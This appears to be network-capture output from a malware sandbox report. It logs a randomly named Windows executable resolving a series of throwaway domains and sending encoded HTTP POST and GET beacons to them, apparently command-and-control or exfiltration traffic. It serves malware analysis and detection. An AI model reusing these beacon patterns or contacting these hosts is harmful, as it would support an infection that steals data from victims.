                                                            Nov 20, 2024 21:10:54.580163002 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:54.700084925 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:54.700328112 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.598834991 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.719331980 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:55.719516993 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.732326984 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.852751970 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.742898941 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.742994070 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.743232012 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.744132042 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.744188070 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.745820045 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.865432024 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:11:03.293638945 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.413746119 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:03.413974047 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.428093910 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.547842979 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:04.519484043 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:04.519624949 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:04.942178965 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:05.061883926 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:05.957777023 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.077658892 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:06.077769995 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.092484951 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.212284088 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:07.191054106 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:07.191144943 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:07.596963882 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:07.716805935 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.614015102 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.734138966 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.734251022 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.749001026 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.870187044 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.870218992 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:09.929326057 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:09.929439068 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:10.252101898 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:10.372347116 CET805000813.248.169.48192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 21:08:55.809027910 CET | 192.168.2.5 | 1.1.1.1 | 0x9122 | Standard query (0) | www.izmirescortg.xyz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:12.880589008 CET | 192.168.2.5 | 1.1.1.1 | 0xff06 | Standard query (0) | www.aballanet.cat | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:28.865216970 CET | 192.168.2.5 | 1.1.1.1 | 0xbb9b | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:29.861475945 CET | 192.168.2.5 | 1.1.1.1 | 0xbb9b | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:44.677521944 CET | 192.168.2.5 | 1.1.1.1 | 0x1707 | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:59.744990110 CET | 192.168.2.5 | 1.1.1.1 | 0x8e45 | Standard query (0) | www.yunlekeji.top | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:16.474227905 CET | 192.168.2.5 | 1.1.1.1 | 0xff28 | Standard query (0) | www.logidant.xyz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:31.489619970 CET | 192.168.2.5 | 1.1.1.1 | 0xebb1 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:47.243146896 CET | 192.168.2.5 | 1.1.1.1 | 0x9ba9 | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:11:02.755608082 CET | 192.168.2.5 | 1.1.1.1 | 0x9924 | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:11:17.567687035 CET | 192.168.2.5 | 1.1.1.1 | 0x7b1d | Standard query (0) | www.brightvision.website | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 21:08:56.276524067 CET | 1.1.1.1 | 192.168.2.5 | 0x9122 | No error (0) | www.izmirescortg.xyz | | 104.21.36.62 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:08:56.276524067 CET | 1.1.1.1 | 192.168.2.5 | 0x9122 | No error (0) | www.izmirescortg.xyz | | 172.67.186.192 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:13.773432970 CET | 1.1.1.1 | 192.168.2.5 | 0xff06 | No error (0) | www.aballanet.cat | aballanet.cat | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 21:09:13.773432970 CET | 1.1.1.1 | 192.168.2.5 | 0xff06 | No error (0) | aballanet.cat | | 134.0.14.158 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:30.053472996 CET | 1.1.1.1 | 192.168.2.5 | 0xbb9b | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:30.053487062 CET | 1.1.1.1 | 192.168.2.5 | 0xbb9b | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:09:45.274712086 CET | 1.1.1.1 | 192.168.2.5 | 0x1707 | No error (0) | www.canadavinreport.site | | 185.27.134.206 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:00.589481115 CET | 1.1.1.1 | 192.168.2.5 | 0x8e45 | No error (0) | www.yunlekeji.top | | 106.15.109.33 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:16.981148958 CET | 1.1.1.1 | 192.168.2.5 | 0xff28 | No error (0) | www.logidant.xyz | logidant.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 21:10:16.981148958 CET | 1.1.1.1 | 192.168.2.5 | 0xff28 | No error (0) | logidant.xyz | | 45.141.156.114 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:32.427583933 CET | 1.1.1.1 | 192.168.2.5 | 0xebb1 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 21:10:32.427583933 CET | 1.1.1.1 | 192.168.2.5 | 0xebb1 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:32.427583933 CET | 1.1.1.1 | 192.168.2.5 | 0xebb1 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:32.427583933 CET | 1.1.1.1 | 192.168.2.5 | 0xebb1 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:32.427583933 CET | 1.1.1.1 | 192.168.2.5 | 0xebb1 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:47.624433041 CET | 1.1.1.1 | 192.168.2.5 | 0x9ba9 | No error (0) | www.zkdamdjj.shop | | 104.21.40.167 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:47.624433041 CET | 1.1.1.1 | 192.168.2.5 | 0x9ba9 | No error (0) | www.zkdamdjj.shop | | 172.67.187.114 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:11:03.291230917 CET | 1.1.1.1 | 192.168.2.5 | 0x9924 | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:11:03.291230917 CET | 1.1.1.1 | 192.168.2.5 | 0x9924 | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:11:17.981044054 CET | 1.1.1.1 | 192.168.2.5 | 0x7b1d | No error (0) | www.brightvision.website | | 203.161.42.73 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49748 | 104.21.36.62 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 21:08:56.420675993 CET | 373 | OUT | GET /lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.izmirescortg.xyz
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Nov 20, 2024 21:08:57.827461958 CET | 1104 | IN | HTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 20:08:57 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KScnn1MU9%2BxRfTJro3YPICHi4D1YPn%2F1oyO5KNSBtQgkqtWUsJAdU6OK%2FFelyJfisitUXQlrPBxByPwPanZG4SOeGyhWTF9oWULlFHZKn5zWfvPEZoc977ttt9Tybp3Y5%2FkUGn4%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5b132f0d1942e7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=373&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49786 | 134.0.14.158 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 21:09:13.912570000 CET | 634 | OUT | POST /6xrr/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 206
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.aballanet.cat
Origin: http://www.aballanet.cat
Referer: http://www.aballanet.cat/6xrr/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49793 | 134.0.14.158 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 21:09:16.578704119 CET | 654 | OUT | POST /6xrr/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 226
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.aballanet.cat
Origin: http://www.aballanet.cat
Referer: http://www.aballanet.cat/6xrr/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDI8tTpeEknH8fuq0RMrBWryw/iRixT+e/tPmG9w


                                                            Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49800 | Destination IP: 134.0.14.158 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:19.239890099 CET | Bytes transferred: 1671 | Direction: OUT | Data:
                                                            POST /6xrr/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.aballanet.cat
                                                            Origin: http://www.aballanet.cat
                                                            Referer: http://www.aballanet.cat/6xrr/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36


                                                            Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49809 | Destination IP: 134.0.14.158 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:21.907308102 CET | Bytes transferred: 370 | Direction: OUT | Data:
                                                            GET /6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.aballanet.cat
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Timestamp: Nov 20, 2024 21:09:23.856789112 CET | Bytes transferred: 498 | Direction: IN | Data:
                                                            HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 20 Nov 2024 20:09:23 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49827 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:30.190546989 CET | Bytes transferred: 625 | Direction: OUT | Data:
                                                            POST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2U0Akrs4BHlGCyXrPRxGFXg9UK3X6UceOjQkYjos=
                                                            Timestamp: Nov 20, 2024 21:09:31.501651049 CET | Bytes transferred: 871 | Direction: IN | Data:
                                                            HTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:31 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133371.1090000; expires=Sat, 18-Nov-2034 20:09:31 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close


                                                            Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49833 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:32.860496998 CET | Bytes transferred: 645 | Direction: OUT | Data:
                                                            POST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEARsakfNFs/n5z0o9/7NDtXK4IvK95rIBig20YlN
                                                            Timestamp: Nov 20, 2024 21:09:34.202760935 CET | Bytes transferred: 871 | Direction: IN | Data:
                                                            HTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:33 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133373.4553886; expires=Sat, 18-Nov-2034 20:09:33 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close


                                                            Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49840 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:35.532941103 CET | Bytes transferred: 1662 | Direction: OUT | Data:
                                                            POST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Timestamp: Nov 20, 2024 21:09:36.800163031 CET | Bytes transferred: 871 | Direction: IN | Data:
                                                            HTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:36 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133376.4844744; expires=Sat, 18-Nov-2034 20:09:36 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close


                                                            Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49848 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:38.215993881 CET | Bytes transferred: 367 | Direction: OUT | Data:
                                                            GET /0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.madhf.tech
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Timestamp: Nov 20, 2024 21:09:39.625582933 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                            HTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:39 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133379.4793557; expires=Sat, 18-Nov-2034 20:09:39 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-length: 1502
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                            Timestamp: Nov 20, 2024 21:09:39.625896931 CET | Bytes transferred: 538 | Direction: IN | Data:
                                                            Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56&fp=-3'>


                                                            Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49864 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:45.490627050 CET | Bytes transferred: 655 | Direction: OUT | Data:
                                                            POST /g3h7/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.canadavinreport.site
                                                            Origin: http://www.canadavinreport.site
                                                            Referer: http://www.canadavinreport.site/g3h7/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSigiRUgfDyqGdoY+kUkJzF4f72IDTBTnvKYIFJXQ=
                                                            Timestamp: Nov 20, 2024 21:09:46.725544930 CET | Bytes transferred: 683 | Direction: IN | Data:
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:09:46 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Cache-Control: no-cache
                                                            Content-Encoding: br


                                                            Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49872 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp: Nov 20, 2024 21:09:48.157494068 CET | Bytes transferred: 675 | Direction: OUT | Data:
                                                            POST /g3h7/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.canadavinreport.site
                                                            Origin: http://www.canadavinreport.site
                                                            Referer: http://www.canadavinreport.site/g3h7/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWYzDmbLkQjGGQ7Y1XAHH6wy2Lo9ou5GlBISBo2VJ
Timestamp: Nov 20, 2024 21:09:49.441334963 CET | Bytes transferred: 683 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 20:09:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Encoding: br
Data Ascii: 1b98 rrd7EsNtYr'\usxMk $0IjxI-vc|`,"p!"J aI;C]$6BVN%J-b?LJ]zw7+qP-Ucc%E>%!/h%x{Z0B-:IRE&!!&,<,l&e^J.d*JarJ@qejr2)w<!<IC-N]L)1_P|7]FXcP+U K$k4k<+@q`>W)OQ~:Y.{*./vBW}=L6B*+)mQZL84S0


